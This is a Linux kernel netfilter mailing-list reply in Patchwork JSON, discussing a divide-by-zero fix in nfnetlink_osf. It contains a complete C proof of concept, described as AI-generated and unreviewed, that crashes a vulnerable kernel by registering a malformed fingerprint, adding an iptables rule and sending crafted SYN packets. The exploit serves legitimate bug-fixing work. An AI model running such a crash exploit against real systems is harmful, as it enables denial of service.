[{"id":3677411,"web_url":"http://patchwork.ozlabs.org/comment/3677411/","msgid":"","list_archive_url":null,"date":"2026-04-14T21:58:11","subject":"Re: [PATCH nf] netfilter: nfnetlink_osf: fix divide-by-zero in\n OSF_WSS_MODULO","submitter":{"id":93033,"url":"http://patchwork.ozlabs.org/api/people/93033/","name":"Xiang Mei","email":"xmei5@asu.edu"},"content":"Hi Pablo,\n\nSorry for the delay. I didn't get time to check the v1 discussion last\nweek. Thanks for the tip that we should patch the bug at the\nconfiguration path.\n\nFor the v2 patch. I have found that if we have `f->opt_num=0`, we can\nbypass this check, and I used Claude to generate a PoC and verified\nit:\n\n```c\n/*\n * AI-GENERATED PoC — This code was produced by an AI assistant.\n * It has NOT been reviewed or verified by a human.\n * Bug: Divide-by-zero in nf_osf_match_one when WSS mode is MODULO and\nwss.val is zero\n * Type: Divide-by-zero / Kernel panic\n * File: net/netfilter/nfnetlink_osf.c\n *\n * Steps:\n * 1. Add malicious OSF fingerprint with wss.wc=OSF_WSS_MODULO(3),\nwss.val=0 via nfnetlink\n * (requires root/CAP_NET_ADMIN in init namespace via capable() check)\n * 2. Add iptables rule with \"osf\" match via raw setsockopt (no\niptables binary needed)\n * 3. Send TCP SYN matching the fingerprint\n * 4. Kernel computes ctx->window % 0 → divide-by-zero Oops\n *\n * REQUIREMENTS:\n * - Root privilege (capable(CAP_NET_ADMIN)) to add OSF fingerprint\n * - CONFIG_IP_NF_FILTER=y (iptables filter table must be compiled in)\n * - CONFIG_NETFILTER_XT_MATCH_OSF=y (osf match compiled in)\n * - CONFIG_NETFILTER_NETLINK_OSF=y (OSF fingerprint database compiled in)\n *\n * Compile: gcc -static -o exploit poc.c -w\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n/* OSF constants */\n#define MAXGENRELEN 32\n#define MAX_IPOPTLEN 40\n#define OSF_WSS_MODULO 3\n#define OSF_ATTR_FINGER 1\n#define OSF_MSG_ADD 0\n#define NFNL_SUBSYS_OSF 5\n#define NFNETLINK_V0 0\n\nstruct nf_osf_wc {\n __u32 wc;\n __u32 val;\n};\n\nstruct nf_osf_opt {\n __u16 kind, length;\n struct nf_osf_wc wc;\n};\n\nstruct nf_osf_user_finger {\n struct nf_osf_wc wss;\n __u8 ttl, df;\n __u16 ss, mss;\n __u16 opt_num;\n char genre[MAXGENRELEN];\n char version[MAXGENRELEN];\n char subtype[MAXGENRELEN];\n struct nf_osf_opt opt[MAX_IPOPTLEN];\n};\n\n/* osf match info (same layout as nf_osf_info from uapi header) */\nstruct osf_match_info {\n char genre[MAXGENRELEN];\n __u32 len;\n __u32 flags; /* NF_OSF_GENRE = 1 */\n __u32 loglevel;\n __u32 ttl;\n};\n#define NF_OSF_GENRE (1 << 0)\n\n/* ---- OSF fingerprint addition via nfnetlink ---- */\n\nstatic int add_osf_fingerprint(void)\n{\n struct {\n struct nlmsghdr nlh;\n struct nfgenmsg nfg;\n struct nlattr nla;\n struct nf_osf_user_finger finger;\n } msg;\n struct sockaddr_nl addr;\n int sock, ret;\n char buf[4096];\n\n memset(&msg, 0, sizeof(msg));\n\n /* Fingerprint: wss.wc=MODULO, wss.val=0 → triggers divide-by-zero */\n msg.finger.wss.wc = OSF_WSS_MODULO;\n msg.finger.wss.val = 0; /* BUG: ctx->window % 0 → SIGFPE */\n msg.finger.ss = 40; /* IP total length: 20 IP + 20 TCP */\n msg.finger.ttl = 64; /* TTL must match */\n msg.finger.df = 0; /* DF=0 → goes into nf_osf_fingers[0] */\n msg.finger.opt_num = 0; /* no TCP options */\n strncpy(msg.finger.genre, \"TestOS\", MAXGENRELEN - 1);\n strncpy(msg.finger.version, \"1.0\", MAXGENRELEN - 1);\n strncpy(msg.finger.subtype, \"test\", MAXGENRELEN - 1);\n\n msg.nla.nla_type = OSF_ATTR_FINGER;\n msg.nla.nla_len = sizeof(struct nlattr) + sizeof(struct\nnf_osf_user_finger);\n msg.nfg.nfgen_family = AF_INET;\n msg.nfg.version = NFNETLINK_V0;\n msg.nlh.nlmsg_type = (NFNL_SUBSYS_OSF << 8) | OSF_MSG_ADD;\n msg.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;\n msg.nlh.nlmsg_len = sizeof(msg);\n msg.nlh.nlmsg_seq = 1;\n msg.nlh.nlmsg_pid = getpid();\n\n sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);\n if (sock < 0) { perror(\"socket(NETLINK_NETFILTER)\"); return -1; }\n\n memset(&addr, 0, sizeof(addr));\n addr.nl_family = AF_NETLINK;\n if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {\n perror(\"bind\"); close(sock); return -1;\n }\n\n struct sockaddr_nl kernel = {.nl_family = AF_NETLINK};\n ret = sendto(sock, &msg, sizeof(msg), 0, (struct sockaddr\n*)&kernel, sizeof(kernel));\n if (ret < 0) { perror(\"sendto(fingerprint)\"); close(sock); return -1; }\n\n /* Check for error response */\n ret = recv(sock, buf, sizeof(buf), MSG_DONTWAIT);\n if (ret > 0) {\n struct nlmsghdr *resp = (struct nlmsghdr *)buf;\n if (resp->nlmsg_type == NLMSG_ERROR) {\n struct nlmsgerr *err = (struct nlmsgerr *)(resp + 1);\n if (err->error != 0) {\n fprintf(stderr, \"[-] OSF fingerprint add error: %d (%s)\\n\",\n -err->error, strerror(-err->error));\n close(sock);\n return -1;\n }\n }\n }\n\n printf(\"[+] OSF fingerprint added (wss.wc=MODULO, wss.val=0)\\n\");\n close(sock);\n return 0;\n}\n\n/* ---- iptables rule addition via raw setsockopt ---- */\n/*\n * Layout of new entry:\n * ipt_entry (112 bytes, aligned 112)\n * xt_entry_match header (32) + osf_match_info data (48) = 80 bytes\n(aligned 80)\n * xt_standard_target (40 bytes, aligned 40)\n * Total: 112 + 80 + 40 = 232 bytes\n */\n\n#define XT_ALIGN8(s) (((s) + 7) & ~7)\n\nstatic int add_iptables_rule(void)\n{\n int sock, ret;\n struct ipt_getinfo info;\n struct ipt_get_entries *old_entries;\n struct ipt_replace *repl;\n size_t match_size, target_size, new_entry_size, new_total_size, old_size;\n unsigned char *new_entries_buf;\n unsigned int input_offset;\n\n /* Sizes */\n match_size = XT_ALIGN8(sizeof(struct xt_entry_match) +\nsizeof(struct osf_match_info));\n target_size = XT_ALIGN8(sizeof(struct xt_standard_target));\n new_entry_size = XT_ALIGN8(sizeof(struct ipt_entry)) + match_size\n+ target_size;\n\n sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);\n if (sock < 0) { perror(\"socket(AF_INET, SOCK_RAW)\"); return -1; }\n\n /* Get current filter table info */\n {\n socklen_t sz = sizeof(info);\n memset(&info, 0, sizeof(info));\n strncpy(info.name, \"filter\", sizeof(info.name) - 1);\n if (getsockopt(sock, IPPROTO_IP, IPT_SO_GET_INFO, &info, &sz) < 0) {\n perror(\"getsockopt(IPT_SO_GET_INFO)\");\n close(sock); return -1;\n }\n }\n old_size = info.size;\n\n /* Get current filter table entries */\n {\n size_t total = sizeof(struct ipt_get_entries) + old_size;\n socklen_t sz;\n old_entries = calloc(1, total);\n if (!old_entries) { perror(\"calloc(old_entries)\");\nclose(sock); return -1; }\n strncpy(old_entries->name, \"filter\", sizeof(old_entries->name) - 1);\n old_entries->size = old_size;\n sz = (socklen_t)total;\n if (getsockopt(sock, IPPROTO_IP, IPT_SO_GET_ENTRIES,\nold_entries, &sz) < 0) {\n perror(\"getsockopt(IPT_SO_GET_ENTRIES)\");\n free(old_entries); close(sock); return -1;\n }\n }\n\n new_total_size = old_size + new_entry_size;\n input_offset = info.hook_entry[NF_INET_LOCAL_IN];\n\n /* Build new entries: [before INPUT] + [our rule] + [original from\nINPUT onward] */\n new_entries_buf = calloc(1, new_total_size);\n if (!new_entries_buf) { perror(\"calloc\"); free(old_entries);\nclose(sock); return -1; }\n\n if (input_offset > 0)\n memcpy(new_entries_buf, old_entries->entrytable, input_offset);\n\n /* Build our iptables entry */\n struct ipt_entry *entry = (struct ipt_entry *)(new_entries_buf +\ninput_offset);\n entry->ip.proto = IPPROTO_TCP; /* match TCP */\n entry->ip.flags = 0;\n entry->ip.invflags = 0;\n entry->nfcache = 0;\n entry->target_offset = XT_ALIGN8(sizeof(struct ipt_entry)) + match_size;\n entry->next_offset = new_entry_size;\n\n /* Match: \"osf\" */\n struct xt_entry_match *mhdr = (struct xt_entry_match *)(entry->elems);\n mhdr->u.user.match_size = (uint16_t)match_size;\n strncpy(mhdr->u.user.name, \"osf\", XT_EXTENSION_MAXNAMELEN - 1);\n mhdr->u.user.revision = 0;\n\n struct osf_match_info *mdata = (struct osf_match_info *)(mhdr->data);\n strncpy(mdata->genre, \"TestOS\", MAXGENRELEN - 1);\n mdata->len = 0;\n mdata->flags = NF_OSF_GENRE;\n mdata->loglevel = 2;\n mdata->ttl = 0;\n\n /* Target: standard ACCEPT (empty name, verdict = -(NF_ACCEPT+1) = -1) */\n struct xt_standard_target *tgt = (struct xt_standard_target *)\n ((char *)entry + entry->target_offset);\n tgt->target.u.user.target_size = (uint16_t)target_size;\n tgt->target.u.user.name[0] = '\\0'; /* XT_STANDARD_TARGET */\n tgt->verdict = -NF_ACCEPT - 1;\n\n /* Copy original entries from INPUT offset onward */\n memcpy(new_entries_buf + input_offset + new_entry_size,\n (char *)old_entries->entrytable + input_offset,\n old_size - input_offset);\n\n /* Build ipt_replace */\n size_t repl_total = sizeof(struct ipt_replace) + new_total_size;\n repl = calloc(1, repl_total);\n if (!repl) { perror(\"calloc(repl)\"); free(new_entries_buf);\nfree(old_entries); close(sock); return -1; }\n\n strncpy(repl->name, \"filter\", sizeof(repl->name) - 1);\n repl->valid_hooks = info.valid_hooks;\n repl->num_entries = info.num_entries + 1;\n repl->size = new_total_size;\n repl->num_counters = info.num_entries;\n repl->counters = calloc(info.num_entries, sizeof(struct xt_counters));\n if (!repl->counters) {\n perror(\"calloc(counters)\");\n free(repl); free(new_entries_buf); free(old_entries); close(sock);\n return -1;\n }\n\n /* Adjust hook/underflow offsets for all chains */\n for (int i = 0; i < NF_INET_NUMHOOKS; i++) {\n if (!(info.valid_hooks & (1 << i))) continue;\n repl->hook_entry[i] = info.hook_entry[i];\n repl->underflow[i] = info.underflow[i];\n /* Shift entries that come after our insertion point */\n if (info.hook_entry[i] > input_offset)\n repl->hook_entry[i] += new_entry_size;\n if (info.underflow[i] >= input_offset)\n repl->underflow[i] += new_entry_size;\n }\n /* INPUT chain: new rule is inserted at input_offset */\n repl->hook_entry[NF_INET_LOCAL_IN] = input_offset;\n\n memcpy(repl->entries, new_entries_buf, new_total_size);\n\n ret = setsockopt(sock, IPPROTO_IP, IPT_SO_SET_REPLACE, repl, repl_total);\n if (ret < 0) {\n perror(\"setsockopt(IPT_SO_SET_REPLACE)\");\n free(repl->counters); free(repl); free(new_entries_buf);\nfree(old_entries);\n close(sock);\n return -1;\n }\n\n printf(\"[+] iptables rule added: -m osf --genre TestOS -j ACCEPT\\n\");\n free(repl->counters); free(repl); free(new_entries_buf); free(old_entries);\n close(sock);\n return 0;\n}\n\n/* ---- TCP SYN packet ---- */\n\nstatic unsigned short ip_checksum(void *ptr, int nbytes) {\n unsigned short *p = ptr;\n unsigned long sum = 0;\n while (nbytes > 1) { sum += *p++; nbytes -= 2; }\n if (nbytes == 1) sum += *(unsigned char *)p;\n sum = (sum >> 16) + (sum & 0xffff);\n sum += (sum >> 16);\n return (unsigned short)(~sum);\n}\n\n/*\n * Send TCP SYN matching the fingerprint:\n * IP total length = 40 (20 IP + 20 TCP, no options)\n * TTL = 64, DF = 0 (no don't-fragment bit)\n * TCP SYN, no TCP options (doff=5)\n * Any window (any % 0 = divide by zero)\n */\nstatic int send_matching_syn(void)\n{\n int sock, one = 1;\n struct sockaddr_in dest;\n char packet[40];\n struct iphdr *ip = (struct iphdr *)packet;\n struct tcphdr *tcp = (struct tcphdr *)(packet + 20);\n\n memset(packet, 0, sizeof(packet));\n\n ip->ihl = 5;\n ip->version = 4;\n ip->tos = 0;\n ip->tot_len = htons(40); /* must match fingerprint ss=40 */\n ip->id = htons(0x1234);\n ip->frag_off = 0; /* DF=0 matches fingerprint df=0 */\n ip->ttl = 64; /* must match fingerprint ttl=64 */\n ip->protocol = IPPROTO_TCP;\n ip->saddr = inet_addr(\"127.0.0.1\");\n ip->daddr = inet_addr(\"127.0.0.1\");\n ip->check = 0;\n ip->check = ip_checksum(ip, 20);\n\n tcp->source = htons(0xbeef);\n tcp->dest = htons(9999);\n tcp->seq = htonl(1);\n tcp->doff = 5; /* no options */\n tcp->syn = 1;\n tcp->window = htons(65535); /* any window % 0 = crash */\n tcp->check = 0;\n\n /* TCP pseudo-header checksum */\n {\n struct { uint32_t s, d; uint8_t z, p; uint16_t l; } ph;\n char buf[sizeof(ph) + 20];\n ph.s = ip->saddr; ph.d = ip->daddr;\n ph.z = 0; ph.p = IPPROTO_TCP; ph.l = htons(20);\n memcpy(buf, &ph, sizeof(ph));\n memcpy(buf + sizeof(ph), tcp, 20);\n tcp->check = ip_checksum(buf, sizeof(buf));\n }\n\n sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);\n if (sock < 0) { perror(\"socket(SOCK_RAW)\"); return -1; }\n if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) {\n perror(\"setsockopt(IP_HDRINCL)\"); close(sock); return -1;\n }\n\n memset(&dest, 0, sizeof(dest));\n dest.sin_family = AF_INET;\n dest.sin_port = htons(9999);\n dest.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n if (sendto(sock, packet, sizeof(packet), 0, (struct sockaddr\n*)&dest, sizeof(dest)) < 0) {\n perror(\"sendto(SYN)\"); close(sock); return -1;\n }\n close(sock);\n return 0;\n}\n\nint main(void)\n{\n printf(\"[*] OSF divide-by-zero PoC\\n\");\n printf(\"[*] Bug: net/netfilter/nfnetlink_osf.c nf_osf_match_one()\\n\");\n printf(\"[*] case OSF_WSS_MODULO: ctx->window %% f->wss.val\\n\");\n printf(\"[*] when wss.val=0, this causes a divide-by-zero kernel\npanic\\n\\n\");\n\n /* Step 1: Add malicious OSF fingerprint */\n printf(\"[*] Step 1: Adding malicious OSF fingerprint (wss.val=0)...\\n\");\n if (add_osf_fingerprint() < 0) {\n fprintf(stderr, \"[-] Fatal: could not add OSF fingerprint\n(need root)\\n\");\n return 1;\n }\n\n /* Step 2: Add iptables rule to activate OSF matching */\n printf(\"[*] Step 2: Adding iptables rule to enable OSF matching...\\n\");\n if (add_iptables_rule() < 0) {\n fprintf(stderr, \"[-] Fatal: could not add iptables rule\\n\");\n return 1;\n }\n\n /* Step 3: Send matching TCP SYN packets */\n printf(\"[*] Step 3: Sending TCP SYN packets to trigger\ndivide-by-zero...\\n\");\n for (int i = 0; i < 5; i++) {\n printf(\"[*] SYN %d/5\\n\", i + 1);\n send_matching_syn();\n usleep(100000);\n }\n\n printf(\"[*] Done. Kernel should have crashed if vulnerable.\\n\");\n return 0;\n}\n```\n\nI'll submit a v2 patch as a follow-up.\n\nThanks,\nXiang\n\nOn Tue, Apr 14, 2026 at 4:17 AM Pablo Neira Ayuso wrote:\n>\n> Xiang Mei says:\n>\n> The OSF_WSS_MODULO branch in nf_osf_match_one() performs:\n>\n> ctx->window % f->wss.val\n>\n> without guarding against f->wss.val == 0. A user with CAP_NET_ADMIN\n> can add an OSF fingerprint with wss.wc = OSF_WSS_MODULO and wss.val = 0\n> via nfnetlink. When a matching TCP SYN packet arrives, the kernel\n> executes a division by zero and panics.\n>\n> The OSF_WSS_PLAIN case already treats val == 0 as a wildcard (match\n> everything). Apply the same semantics to OSF_WSS_MODULO: if val is 0,\n> any window value matches rather than dividing by zero.\n>\n> Crash:\n> Oops: divide error: 0000 [#1] SMP KASAN NOPTI\n> RIP: 0010:nf_osf_match_one (net/netfilter/nfnetlink_osf.c:98)\n> Call Trace:\n> \n> nf_osf_match (net/netfilter/nfnetlink_osf.c:220 (discriminator 6))\n> xt_osf_match_packet (net/netfilter/xt_osf.c:32)\n> ipt_do_table (net/ipv4/netfilter/ip_tables.c:348)\n> nf_hook_slow (net/netfilter/core.c:622 (discriminator 1))\n> ip_local_deliver (net/ipv4/ip_input.c:265)\n> ip_rcv (include/linux/skbuff.h:1162)\n> __netif_receive_skb_one_core (net/core/dev.c:6181)\n> process_backlog (.include/linux/skbuff.h:2502 net/core/dev.c:6642)\n> __napi_poll (net/core/dev.c:7710)\n> net_rx_action (net/core/dev.c:7945)\n> handle_softirqs (kernel/softirq.c:622\n>\n> Fix this from control plane, reject f->wss.val == 0 if wss.ws is\n> OSF_WSS_MODULO.\n>\n> Fixes: 11eeef41d5f6 (\"netfilter: passive OS fingerprint xtables match\")\n> Reported-by: Xiang Mei \n> Signed-off-by: Pablo Neira Ayuso \n> ---\n> Apologies, I don't mean to step on your feet with this patch.\n> This just expedites scrutiny before PR submission.\n>\n> net/netfilter/nfnetlink_osf.c | 9 +++++++++\n> 1 file changed, 9 insertions(+)\n>\n> diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c\n> index 5d15651c74f0..bf47a3812910 100644\n> --- a/net/netfilter/nfnetlink_osf.c\n> +++ b/net/netfilter/nfnetlink_osf.c\n> @@ -329,6 +329,15 @@ static int nfnl_osf_add_callback(struct sk_buff *skb,\n> if (f->opt[i].kind == OSFOPT_MSS && f->opt[i].length < 4)\n> return -EINVAL;\n>\n> + switch (f->wss.wc) {\n> + case OSF_WSS_MODULO:\n> + if (f->wss.val == 0)\n> + return -EINVAL;\n> + break;\n> + default:\n> + break;\n> + }\n> +\n> tot_opt_len += f->opt[i].length;\n> if (tot_opt_len > MAX_IPOPTLEN)\n> return -EINVAL;\n> --\n> 2.47.3\n>","headers":{"Return-Path":"\n ","X-Original-To":["incoming@patchwork.ozlabs.org","netfilter-devel@vger.kernel.org"],"Delivered-To":"patchwork-incoming@legolas.ozlabs.org","Authentication-Results":["legolas.ozlabs.org;\n\tdkim=pass (2048-bit key;\n unprotected) header.d=asu.edu header.i=@asu.edu header.a=rsa-sha256\n header.s=google header.b=PWobDmow;\n\tdkim-atps=neutral","legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=vger.kernel.org\n (client-ip=2600:3c04:e001:36c::12fc:5321; helo=tor.lore.kernel.org;\n envelope-from=netfilter-devel+bounces-11894-incoming=patchwork.ozlabs.org@vger.kernel.org;\n receiver=patchwork.ozlabs.org)","smtp.subspace.kernel.org;\n\tdkim=pass (2048-bit key) header.d=asu.edu header.i=@asu.edu\n header.b=\"PWobDmow\"","smtp.subspace.kernel.org;\n arc=pass smtp.client-ip=209.85.216.41","smtp.subspace.kernel.org;\n dmarc=pass (p=none dis=none) header.from=asu.edu","smtp.subspace.kernel.org;\n spf=pass smtp.mailfrom=asu.edu"],"Received":["from tor.lore.kernel.org (tor.lore.kernel.org\n [IPv6:2600:3c04:e001:36c::12fc:5321])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519 server-signature ECDSA (secp384r1) server-digest SHA384)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4fwJ7h5nqjz1yD5\n\tfor ; Wed, 15 Apr 2026 07:58:40 +1000 (AEST)","from smtp.subspace.kernel.org (conduit.subspace.kernel.org\n [100.90.174.1])\n\tby tor.lore.kernel.org (Postfix) with ESMTP id 1E0603066A16\n\tfor ; Tue, 14 Apr 2026 21:58:29 +0000 (UTC)","from localhost.localdomain (localhost.localdomain [127.0.0.1])\n\tby smtp.subspace.kernel.org (Postfix) with ESMTP id 3BAB63033CC;\n\tTue, 14 Apr 2026 21:58:26 +0000 (UTC)","from mail-pj1-f41.google.com (mail-pj1-f41.google.com\n [209.85.216.41])\n\t(using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits))\n\t(No client certificate requested)\n\tby smtp.subspace.kernel.org (Postfix) with ESMTPS id A477A2FC893\n\tfor ; Tue, 14 Apr 2026 21:58:23 +0000 (UTC)","by mail-pj1-f41.google.com with SMTP id\n 98e67ed59e1d1-35fb0bb27e7so1914203a91.1\n for ;\n Tue, 14 Apr 2026 14:58:23 -0700 (PDT)"],"ARC-Seal":["i=2; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116;\n\tt=1776203905; cv=pass;\n b=ZT0EEZ6gmFxCG2jEYym4wW//iDmhxeTGRfbE24GYCe+8tKKBefROcMQPS0gpjjFj9Nqjcdb+1+rUE/kGsi9kr3KhB+BqhyWke04uYBmlS4eWrnHxbPOYvIwgRBd9W4WnymwluQm1KedWyMcfnJbBUvHo5BnwfVDIxROfmifvgFo=","i=1; a=rsa-sha256; t=1776203903; cv=none;\n d=google.com; s=arc-20240605;\n b=V+VJiNzuMg129YjgqTZZMaeQ0gqyDqYcW67mV7iUTxVylFUhCaVMdx7KXASIcX8vys\n eel97yEBmnhuPqtvzLzskxLiRa1omU03idw0IEs/RdchEEfnlU4P9Lfn+feVY/sFlmyt\n xFR7SD8ZjCyVt9+nZ5tefozdDOciNpH48chw9gZmnw9lEl1sfwApYY+uWVcDuYRQllOl\n HMaIRDhBCE0Fbm5F0ZpToNZLSopV5F4bW6vsLgX4Ivq2N3epuJoX28Gw1JfJGy0RW1l3\n cAwXVQ8wdyCjGOqYiduyrIexlhRVXuiOk4JCiNqrUr7rmwDr3Lwe6fo/I1RQuB7GadsE\n F5GA=="],"ARC-Message-Signature":["i=2; a=rsa-sha256; d=subspace.kernel.org;\n\ts=arc-20240116; t=1776203905; c=relaxed/simple;\n\tbh=VYUp+CXbktytZnZIK65bQo4lp6X3GIu3631P1lRm2X8=;\n\th=MIME-Version:References:In-Reply-To:From:Date:Message-ID:Subject:\n\t To:Cc:Content-Type;\n b=ZE+XVNlOTzvystHRhJ9FZb2FVkrn0WI+YbGDqaWQBknbYFPjTFKS+GW93H+GOGK5SZV24Ac5TjkSE5cmFax9DeynJvArupZRscPwGC3FWAQXl2XyVFqomyw7vSXpFsrf4mkbyvuWTDbRxQQOgVa07IGqjzbAN1VcVsVEmo2hP7A=","i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com;\n s=arc-20240605;\n h=content-transfer-encoding:cc:to:subject:message-id:date:from\n :in-reply-to:references:mime-version:dkim-signature;\n bh=jRKUQzZoCCj1XLGWWBAbiRcsTGFtWo/NfSmzA+Hkq18=;\n fh=iCjVDsbW9GMWkouiosnpqntZ8wkDB0SG4Dkaz0NZRz4=;\n b=OQScPrTae1H9qWJ/j9TW1nTkGsalyLAjnfCWAe8/lk5neOsSHFCN+TezmAToeiwKam\n rxY11jNimdI31XaDYUuvP7e7tub6wvxox/LHALghTdoM5FkSZgHGLaAeYRHQxj9Tdl3n\n 3IVoetHwsfnumcUBeoQH84ROKEHIz0KDaEvfkekzxi6RMBN79Pvi2PT4zHbrejbeuvds\n hz/UOFNcBB8yHvMK7uarIWuQEv/SzgzE4HzSR2YJhoGxoz7otoia+cgXXzHvfuFKQsb/\n 7lEYfC0tFZO2A/9gNNcSa17vvs9M3bu1PD0HEA0RIAfHG9COJLLzT/BXrm9simVWw7v4\n h0xw==;\n darn=vger.kernel.org"],"ARC-Authentication-Results":["i=2; smtp.subspace.kernel.org;\n dmarc=pass (p=none dis=none) header.from=asu.edu;\n spf=pass smtp.mailfrom=asu.edu;\n dkim=pass (2048-bit key) header.d=asu.edu header.i=@asu.edu\n header.b=PWobDmow; arc=pass smtp.client-ip=209.85.216.41","i=1; mx.google.com; arc=none"],"DKIM-Signature":"v=1; a=rsa-sha256; c=relaxed/relaxed;\n d=asu.edu; s=google; t=1776203903; x=1776808703; darn=vger.kernel.org;\n h=content-transfer-encoding:cc:to:subject:message-id:date:from\n :in-reply-to:references:mime-version:from:to:cc:subject:date\n :message-id:reply-to;\n bh=jRKUQzZoCCj1XLGWWBAbiRcsTGFtWo/NfSmzA+Hkq18=;\n b=PWobDmowuQLf9NYTTvpTc70dER5pxHxSj/HyLKiw2/MoeNDz2tSBYAfTSvtMhYAoMC\n z/zk2OpVcE+jFImTMjf2V5At46A2q9p4Mi0KvLZwG5PUsMHhS/Ara0U7eKQgcOKrFnVx\n 3hHds3W8cdE9exf3IWLCFqwU3zLcoTHqegugmGblA63WQM2rQ80Z6r7X8swlrxVKhRwf\n L3blWqqyazAWSrYCQu/F4bSr/5yXmHru+LzNhoQoqedBi22y7m+X5+73r2KBoT5O8eV4\n Zg0OUGMrPCrUvAQL+kdcabS3eh54s63A0LgVbdsZdhT+GQIjvirt8UTTaf/mgIHXUVa6\n AYSA==","X-Google-DKIM-Signature":"v=1; a=rsa-sha256; c=relaxed/relaxed;\n d=1e100.net; s=20251104; t=1776203903; x=1776808703;\n h=content-transfer-encoding:cc:to:subject:message-id:date:from\n :in-reply-to:references:mime-version:x-gm-gg:x-gm-message-state:from\n :to:cc:subject:date:message-id:reply-to;\n bh=jRKUQzZoCCj1XLGWWBAbiRcsTGFtWo/NfSmzA+Hkq18=;\n b=adNmgGhMvMhucWnPcza1na8pyfppC3QQ4/71R/1r4GoCl8US1xgNjy/UHHgKhCcZdq\n qQET4q1RgyuanL9H0ydNZd5TADS6Y7btoeV7eSQxkldvI+YFOnqWfyY3Ycs/H0uT77rj\n sAyCGrlpBATexc15t7ZMmshqci9gjknG5Y/xoO9Arj4CKpSirqdil1/VdNEGBDivoJ3S\n oWVxUt1VwThkWTLW7DJRouz9Bl/EUeRGQjEFZq5EgAKXF5hHCHUxeHa8F1cjJI1UVZTh\n heK4nZA/P61n5dRXSy6KYSkqqQor6/wBHIJBC0KKryU+DWXHKDGnFNVIsI6+Bj9xSUQ6\n ARHg==","X-Gm-Message-State":"AOJu0YxkIHPxnTgm6dpxBgOJWa949tTyMbTbWSiUwa7S/FzgFxDPppUF\n\tVudmJCAeZAgHwE5hLy1eaUdD7+Lamr8RTHuIoe/atVCPHmnOCGosS/lSlGjtQkQ7wDqYI+mgjAj\n\tY/yGWQQV66F1ppek3jvEEXdxysmDSGv6HRm0ybODwzI2ZdUcdRRih/roE","X-Gm-Gg":"AeBDievGjJUAnsJs2xOlzxvNI7Otdyh86orPzeqrLQ0Z5obKiwqutLtCpZcMlEMInwX\n\t2qzyp8tdhx4RfBlLfdOqkppMNaW7MCptRRy1iqisRi3Uvkw7aLTq/PZxiGjb5+2cI4stzCzF6Uu\n\tEB504ExlZqHG2RknMURy2IhGeqfO5o16gbt5xjPnMc2OvFfGXKuW/1PorZlJ9jtaFyPxYFuVSnh\n\tIz7/ZH6cnIZa2WUyAVnFND36cHABdxeVrHZh/ahFMPGEVfDc4BeoB306tzJKZYe5mr2UO0r06Aj\n\tpmBvHUaXommNdqE9WgmraxVx/Kx88w==","X-Received":"by 2002:a17:90b:4988:b0:359:f6f8:57b8 with SMTP id\n 98e67ed59e1d1-35e4254146amr19122915a91.1.1776203902850; Tue, 14 Apr 2026\n 14:58:22 -0700 (PDT)","Precedence":"bulk","X-Mailing-List":"netfilter-devel@vger.kernel.org","List-Id":"","List-Subscribe":"","List-Unsubscribe":"","MIME-Version":"1.0","References":"<20260414111722.6944-1-pablo@netfilter.org>","In-Reply-To":"<20260414111722.6944-1-pablo@netfilter.org>","From":"Xiang Mei ","Date":"Tue, 14 Apr 2026 14:58:11 -0700","X-Gm-Features":"AQROBzD4tVnf9bukLQBQxdznHJxbswHWRCLu-0bXv_9HE2VdwImekhhqSUkXnos","Message-ID":"\n ","Subject":"Re: [PATCH nf] netfilter: nfnetlink_osf: fix divide-by-zero in\n OSF_WSS_MODULO","To":"Pablo Neira Ayuso ","Cc":"netfilter-devel@vger.kernel.org, fw@strlen.de","Content-Type":"text/plain; charset=\"UTF-8\"","Content-Transfer-Encoding":"quoted-printable"}}]